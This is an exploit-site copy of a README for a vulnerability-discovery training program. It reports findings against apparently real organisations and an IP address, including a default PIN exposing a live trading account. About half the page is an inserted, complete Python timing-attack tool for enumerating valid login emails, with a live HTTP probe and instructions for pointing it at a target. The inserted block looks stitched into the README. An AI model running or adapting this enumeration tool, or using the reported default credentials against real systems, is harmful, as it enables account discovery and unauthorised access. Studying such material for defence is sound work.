## https://sploitus.com/exploit?id=F7DCC272-C68B-5B52-85D0-A0DF46F665BC
# Vulnerability Discovery Training (VDT)
Training material for advanced vulnerability discovery, focused on hard-to-detect attack vectors that require custom tooling, timing analysis, and non-standard approaches rather than off-the-shelf scanners.
## Overview
This repository documents a systematic vulnerability discovery training program designed to teach:
- **Custom tool development** for measurement-based attacks
- **Timing attack** methodology and statistical analysis
- **Side-channel exploitation** beyond standard CVE scanning
- **Systematic enumeration** when standard exploits fail
## Structure
```
VDT/
├── findings/     # Assessment reports per target
├── tools/        # Custom exploitation tools
├── methodology/  # Documented techniques and insights
└── targets/      # Target metadata and context
```
## Training Methodology
### Assessment Flow
1. **Reconnaissance** - Port scan, service fingerprinting, technology stack
2. **Standard Exploitation** - Test common vulnerabilities (SQLi, XSS, IDOR, default creds)
3. **Custom Tooling** - When standard fails, build measurement tools
4. **Side-Channel Analysis** - Timing attacks, error differentials, statistical analysis
5. **Verification** - Prove exploitability with minimal impact
### Key Principle
> "When 100+ standard attack vectors fail, the vulnerability often requires custom measurement tooling. Timing differentials, error message analysis, and statistical correlation reveal what scanners miss."
## Notable Findings
### TrustPoint CRM - User Enumeration via Timing Attack (CVSS 7.5)
- **Challenge**: 2+ hours testing 100+ standard vectors with no findings
- **Breakthrough**: Custom Python timing tool revealed a ~200 ms response-time differential between existing and non-existent accounts
- **Technique**: Statistical analysis over 5 iterations per email, so the differential could be separated from ordinary network jitter
- **Result**: 4 valid accounts identified (admin@default.com, demo@default.com, test@default.com, user@default.com)
- **Tool**: `tools/trustpoint_bypass.py`
### MEIC Capital - Default PIN Authentication Bypass (CVSS 9.8)
- **Finding**: Default PIN "1234" grants full access
- **Impact**: Live $16K IBKR trading account exposed
- **Technique**: Standard default credential testing
### Tufts Genomics - INCOMPLETE
- **Status**: Instructor confirmed a vulnerability exists, but it was not found during the assessment
- **Tested**: 50+ attack vectors across Rails 3 / Apache 2.2.34 / Phusion Passenger 3.0.18
- **Platform**: MPS LIMS (Laboratory Information Management System)
- **Challenge**: Authentication boundary holds against all standard and many custom attacks
## Tools Developed
### Timing Attack Framework
- `trustpoint_bypass.py` - Statistical timing analysis for user enumeration
- Measures response-time deltas on the login endpoint to distinguish existing accounts from non-existent ones
- Configurable iteration count per candidate for statistical confidence
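As an added worked example (this is not the repository's `trustpoint_bypass.py`, which is not reproduced on this page), the script below shows the measurement-and-statistics loop behind steps 3 and 4 of the assessment flow and the timing framework described above: interleaved sampling across a candidate list, median-based comparison against a baseline, and a noise estimate for judging whether a differential is real or needs more iterations. The simulated target, the email wordlist and the 40 ms / 200 ms latencies are constructed for the demo; the `http_probe` helper's form field names (`email`, `password`) are assumptions to be matched to a real target.

```python
"""Timing-differential user enumeration: sample collection and statistics.

Added example, not the repository's own tool. It assumes a login endpoint
that does extra work (e.g. a slow password hash) only when the submitted
email exists, so existing accounts answer measurably later.
"""
import random
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional, Set


def collect_samples(probe: Callable[[str], float], candidates: Iterable[str],
                    iterations: int, rng: Optional[random.Random] = None) -> Dict[str, List[float]]:
    """Time `probe` for every candidate, `iterations` times each.

    Every round visits the candidates in a fresh random order so that slow
    drift (server load, GC pauses, network jitter) is spread across all of
    them instead of biasing whichever email happened to be measured last.
    """
    rng = rng or random.Random()
    order = list(candidates)
    samples: Dict[str, List[float]] = {c: [] for c in order}
    for _ in range(iterations):
        rng.shuffle(order)
        for email in order:
            samples[email].append(probe(email))
    return samples


def _mad(values: List[float]) -> float:
    """Median absolute deviation: a spread estimate one outlier cannot inflate."""
    med = statistics.median(values)
    return statistics.median(abs(v - med) for v in values)


def classify(samples: Dict[str, List[float]], min_delta: float) -> Dict[str, object]:
    """Flag candidates whose median latency sits >= `min_delta` seconds above the bulk.

    Medians rather than means: one stalled request would otherwise push a
    non-existent account over the threshold. The baseline is the median of the
    per-candidate medians, which assumes most probed emails do not exist (true
    for a wordlist). `noise` is the typical within-candidate spread; a delta
    that is not several times larger than it needs more iterations, not a report.
    """
    medians = {c: statistics.median(v) for c, v in samples.items()}
    baseline = statistics.median(medians.values())
    noise = statistics.median(_mad(v) for v in samples.values())
    deltas = {c: m - baseline for c, m in medians.items()}
    valid = {c for c, d in deltas.items() if d >= min_delta}
    return {"baseline": baseline, "noise": noise, "deltas": deltas, "valid": valid}


def simulated_login(valid_accounts: Set[str], rng: random.Random) -> Callable[[str], float]:
    """Constructed stand-in for a vulnerable login endpoint (not a real target).

    Unknown emails return after a database miss (~40 ms); known emails also run
    a slow hash before rejecting the wrong password (~+200 ms). The latency is
    returned as a number rather than slept, so the demo is instant and deterministic.
    """
    def probe(email: str) -> float:
        latency = 0.040 + rng.gauss(0, 0.008)
        if email in valid_accounts:
            latency += 0.200 + rng.gauss(0, 0.012)
        return max(latency, 0.0)
    return probe


def http_probe(url: str, password: str = "definitely-wrong") -> Callable[[str], float]:
    """Probe for a real endpoint: wall-clock time of one login POST.

    Field names `email`/`password` are assumptions; match them to the target's form.
    """
    def probe(email: str) -> float:
        body = urllib.parse.urlencode({"email": email, "password": password}).encode()
        start = time.perf_counter()
        try:
            urllib.request.urlopen(url, data=body, timeout=10).read()
        except urllib.error.HTTPError as err:
            err.read()  # a 401/403 is still a complete, timeable response
        return time.perf_counter() - start
    return probe


def run_demo(iterations: int = 5, seed: int = 7) -> Dict[str, object]:
    """Enumerate a constructed wordlist against the simulated target."""
    rng = random.Random(seed)
    existing = {"admin@default.com", "demo@default.com"}  # constructed
    wordlist = sorted(existing | {f"{n}@default.com" for n in
                                  ("alice", "bob", "carol", "dave", "erin", "frank")})
    samples = collect_samples(simulated_login(existing, rng), wordlist, iterations, rng)
    return classify(samples, min_delta=0.100)


if __name__ == "__main__":
    report = run_demo()
    print(f"baseline {report['baseline'] * 1000:.1f} ms, noise {report['noise'] * 1000:.1f} ms")
    for email, delta in sorted(report["deltas"].items(), key=lambda kv: -kv[1]):
        flag = "VALID" if email in report["valid"] else "     "
        print(f"{flag} {email:22s} {delta * 1000:+7.1f} ms")
```

Swap `simulated_login(...)` for `http_probe("https://target/login")` to run it against an authorised target; keep the iteration count configurable, because on a noisy link a 200 ms gap that stands out at 5 samples may need 20 or more before the delta clears the noise estimate.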
### Testing Scripts
- Multiple target-specific enumeration and exploitation scripts
- Parameter pollution testing
- Session manipulation attempts
- Format-based bypass testing
## Learning Outcomes
1. **Patience** - Some vulnerabilities require hours of systematic testing
2. **Measurement** - Build tools to measure what scanners don't see
3. **Statistics** - Side-channel attacks need multiple samples for confidence
4. **Creativity** - Standard CVE scanning misses entire vulnerability classes
## Targets Assessed
| Target | Status | CVSS | Finding Type |
|--------|--------|------|--------------|
| TrustPoint CRM | Complete | 7.5 | Timing-based user enumeration |
| MEIC Capital | Complete | 9.8 | Default credential bypass |
| B2B Bank | Complete | None | Enterprise hardened (no findings) |
| ESRI GNSS | Complete | Low | Outdated software (public data) |
| CPPLUS NVR | Complete | None | Well-secured IoT |
| Tufts Genomics | Incomplete | Unknown | Auth boundary held |
| 137.189.174.205 | Offline | N/A | Target unreachable |
## Attribution
- **Researcher**: Nicholas Kloster + Claude Sonnet 4.5
- **Organization**: NuClide Research
- **Date**: July 2026
- **Purpose**: Security research training and methodology development
## Ethics
All testing conducted on targets provided by instructor. No unauthorized access. No data exfiltration beyond proof of exploitability. Assessment stopped at proof-of-concept stage.